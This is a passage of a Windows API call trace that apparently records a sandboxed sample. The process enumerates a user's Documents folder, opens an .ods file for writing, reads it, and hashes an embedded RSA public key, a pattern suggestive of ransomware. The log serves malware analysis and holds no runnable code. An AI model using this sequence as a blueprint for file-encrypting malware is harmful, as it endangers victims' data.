lpMem=0x37ba6f0 | out: hHeap=0x630000) returned 1 [0233.545] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x37ba6f0 [0233.545] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a2b08 [0233.545] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0233.545] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37ba6f0 | out: hHeap=0x630000) returned 1 [0233.545] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x37ba6f0 [0233.545] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a2b08 [0233.545] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0233.545] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37ba6f0 | out: hHeap=0x630000) returned 1 [0233.545] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x37ba6f0 [0233.545] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0233.545] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0233.545] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37ba6f0 | out: hHeap=0x630000) returned 1 [0233.545] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x37ba6f0 [0233.545] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0233.545] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0233.545] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37ba6f0 | out: hHeap=0x630000) returned 1 [0233.545] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x37ba6f0 [0233.545] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0233.545] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0233.545] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37ba6f0 | out: hHeap=0x630000) returned 1 [0233.545] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x37ba6f0 [0233.545] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0233.546] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0233.546] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37ba6f0 | out: hHeap=0x630000) returned 1 [0233.546] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x37ba6f0 [0233.546] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0233.546] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0233.546] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37ba6f0 | out: hHeap=0x630000) returned 1 [0233.546] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x37ba6f0 [0233.546] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0233.546] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0233.546] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37ba6f0 | out: hHeap=0x630000) returned 1 [0233.546] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x37ba6f0 [0233.546] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0233.546] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0233.546] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37ba6f0 | out: hHeap=0x630000) returned 1 [0233.546] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x37ba6f0 [0233.546] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0233.546] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x325c3b0 [0233.546] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0233.546] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0233.546] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37ba6f0 | out: hHeap=0x630000) returned 1 [0233.546] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x37ba6f0 [0233.546] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0233.546] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0233.546] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37ba6f0 | out: hHeap=0x630000) returned 1 [0233.546] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x37ba6f0 [0233.547] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x37b5b70 [0233.547] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5b70 | out: hHeap=0x630000) returned 1 [0233.547] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37ba6f0 | out: hHeap=0x630000) returned 1 [0233.547] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x37ba6f0 [0233.547] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x37b5b70 [0233.547] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5b70 | out: hHeap=0x630000) returned 1 [0233.547] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37ba6f0 | out: hHeap=0x630000) returned 1 [0233.547] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x37ba6f0 [0233.547] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0233.547] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0233.547] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37ba6f0 | out: hHeap=0x630000) returned 1 [0233.547] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x37ba6f0 [0233.547] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0233.547] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0233.547] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37ba6f0 | out: hHeap=0x630000) returned 1 [0233.547] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x37ba6f0 [0233.547] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0233.547] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x325c3b0 [0233.547] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0233.547] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0233.547] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37ba6f0 | out: hHeap=0x630000) returned 1 [0233.547] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x37ba6f0 [0233.547] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a2b08 [0233.547] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0233.547] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37ba6f0 | out: hHeap=0x630000) returned 1 [0233.547] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x37ba6f0 [0233.547] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0233.548] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0233.548] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37ba6f0 | out: hHeap=0x630000) returned 1 [0233.548] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x37ba6f0 [0233.548] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0233.548] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0233.548] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37ba6f0 | out: hHeap=0x630000) returned 1 [0233.548] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x37ba6f0 [0233.548] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0233.548] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0233.548] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37ba6f0 | out: hHeap=0x630000) returned 1 [0233.548] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x37ba6f0 [0233.548] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0233.548] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0233.548] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37ba6f0 | out: hHeap=0x630000) returned 1 [0233.548] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x37ba6f0 [0233.548] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0233.548] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0233.548] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37ba6f0 | out: hHeap=0x630000) returned 1 [0233.548] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x37ba6f0 [0233.548] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\X0h6NwRPaRX5m\\") returned="X0h6NwRPaRX5m\\" [0233.548] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0233.548] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x711900 [0233.548] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37ba6f0 | out: hHeap=0x630000) returned 1 [0233.548] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="Documents\\" [0233.548] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x37bb810 [0233.548] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x711900 | out: hHeap=0x630000) returned 1 [0233.548] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0233.548] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a20 [0233.548] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0233.548] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0233.549] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bb810 | out: hHeap=0x630000) returned 1 [0233.549] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0233.549] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0233.549] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0233.549] PathFindFileNameW (pszPath="") returned="" [0233.549] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x37ba6f0 [0233.549] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\X0h6NwRPaRX5m\\*", lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xb3544ca0, ftCreationTime.dwHighDateTime=0x1d5e60c, ftLastAccessTime.dwLowDateTime=0x22fedc50, ftLastAccessTime.dwHighDateTime=0x1d5e5ef, ftLastWriteTime.dwLowDateTime=0x22fedc50, ftLastWriteTime.dwHighDateTime=0x1d5e5ef, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x31de130 [0233.550] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37ba6f0 | out: hHeap=0x630000) returned 1 [0233.550] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xb3544ca0, ftCreationTime.dwHighDateTime=0x1d5e60c, ftLastAccessTime.dwLowDateTime=0x22fedc50, ftLastAccessTime.dwHighDateTime=0x1d5e5ef, ftLastWriteTime.dwLowDateTime=0x22fedc50, ftLastWriteTime.dwHighDateTime=0x1d5e5ef, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0233.550] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7c797c20, ftCreationTime.dwHighDateTime=0x1d5d95d, ftLastAccessTime.dwLowDateTime=0x6ebd9830, ftLastAccessTime.dwHighDateTime=0x1d5e549, ftLastWriteTime.dwLowDateTime=0x6ebd9830, ftLastWriteTime.dwHighDateTime=0x1d5e549, nFileSizeHigh=0x0, nFileSizeLow=0x51a1, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="-I-Xy5gtCCf2anzAp.ods", cAlternateFileName="-I-XY5~1.ODS")) returned 1 [0233.550] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x37ba6f0 [0233.550] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa6) returned 0x31a46c0 [0233.550] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37ba6f0 | out: hHeap=0x630000) returned 1 [0233.550] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\X0h6NwRPaRX5m\\-I-Xy5gtCCf2anzAp.ods") returned=".ods" [0233.550] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\X0h6NwRPaRX5m\\-I-Xy5gtCCf2anzAp.ods" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\x0h6nwrparx5m\\-i-xy5gtccf2anzap.ods"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x640 [0233.551] GetFileSizeEx (in: hFile=0x640, lpFileSize=0x3adfb40 | out: lpFileSize=0x3adfb40*=20897) returned 1 [0233.551] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3c20000 [0233.554] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0x517b, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0233.554] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x3adfb78, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb78*=0x26, lpOverlapped=0x0) returned 1 [0233.556] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a58 [0233.563] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0233.563] SetFilePointer (in: hFile=0x640, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0233.563] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x3adfb70, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb70*=0x51a1, lpOverlapped=0x0) returned 1 [0233.564] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0233.564] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f6) returned 0x325fb40 [0233.564] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0233.564] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0233.570] CryptAcquireContextW (in: phProv=0x3adfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x3adfa50*=0x694398) returned 1 [0233.571] CryptCreateHash (in: hProv=0x694398, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x3adfa58 | out: phHash=0x3adfa58) returned 1 [0233.571] CryptHashData (hHash=0x31de170, pbData=0x325fb40, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0233.571] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x0, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x3adfa54) returned 1 [0233.571] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x31a0f08 [0233.571] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x31a0f08, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x31a0f08, pdwDataLen=0x3adfa54) returned 1 [0233.571] GetLastError () returned 0x0 [0233.571] CryptDestroyHash (hHash=0x31de170) returned 1 [0233.571] CryptReleaseContext (hProv=0x694398, dwFlags=0x0) returned 1 [0233.571] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325fb40 | out: hHeap=0x630000) returned 1 [0233.572] UuidCreate (in: Uuid=0x3adfa48 | out: Uuid=0x3adfa48) returned 0x0 [0233.572] UuidToStringA (in: Uuid=0x3adfa48, StringUuid=0x3adfa40 | out: StringUuid=0x3adfa40) returned 0x0 [0233.572] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a90 [0233.572] RpcStringFreeA (in: String=0x3adfa40 | out: String=0x3adfa40) returned 0x0 [0233.572] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0233.572] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a58 [0233.572] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x51a0) returned 0x37c2278 [0233.572] SetFilePointer (in: hFile=0x640, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0233.572] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a90 | out: hHeap=0x630000) returned 1 [0233.572] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x325fb40 [0233.572] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a90 [0233.572] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x325fd48 [0233.572] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x31d6990 [0233.579] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x37bb810 [0233.579] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee3d0 [0233.579] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x37bb858 [0233.579] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee3e8 [0233.579] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee418 [0233.579] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee478 [0233.579] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee430 [0233.586] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x24) returned 0x31ec670 [0233.586] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x158) returned 0x31f7b30 [0233.586] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x31f7b30, Size=0x218) returned 0x37b1b88 [0233.587] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x37b5b70 [0233.587] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee418 | out: hHeap=0x630000) returned 1 [0233.587] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee430 | out: hHeap=0x630000) returned 1 [0233.587] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee478 | out: hHeap=0x630000) returned 1 [0233.587] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ec670 | out: hHeap=0x630000) returned 1 [0233.587] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5b70 | out: hHeap=0x630000) returned 1 [0233.587] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee478 [0233.587] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72fee0 [0233.587] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x31ee430 [0233.587] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x31a0f28 [0233.587] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x9) returned 0x31ee418 [0233.587] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72fea0 [0233.587] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10e) returned 0x31a4298 [0233.587] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0233.587] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x31d6930 [0233.587] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0f08 [0233.587] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x104) returned 0x31f6b30 [0233.587] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0ee8 [0233.587] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72feb0 [0233.587] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a4298 | out: hHeap=0x630000) returned 1 [0233.587] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee430 | out: hHeap=0x630000) returned 1 [0233.587] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fea0 | out: hHeap=0x630000) returned 1 [0233.588] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee418 | out: hHeap=0x630000) returned 1 [0233.588] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0f28 | out: hHeap=0x630000) returned 1 [0233.588] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fee0 | out: hHeap=0x630000) returned 1 [0233.588] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee478 | out: hHeap=0x630000) returned 1 [0233.596] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0233.596] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31d6990 | out: hHeap=0x630000) returned 1 [0233.596] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b1b88 | out: hHeap=0x630000) returned 1 [0233.596] GetCurrentThreadId () returned 0x314 [0233.596] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x31a4298 [0233.596] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x82) returned 0x37b9e00 [0233.596] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x2c) returned 0x31a8ac8 [0233.596] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x694398 [0233.596] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x148) returned 0x3192918 [0233.596] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fee0 [0233.596] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fea0 [0233.596] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x65dd10 [0233.596] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0233.597] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0233.597] GetCurrentThreadId () returned 0x314 [0233.597] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0233.597] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0233.597] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, 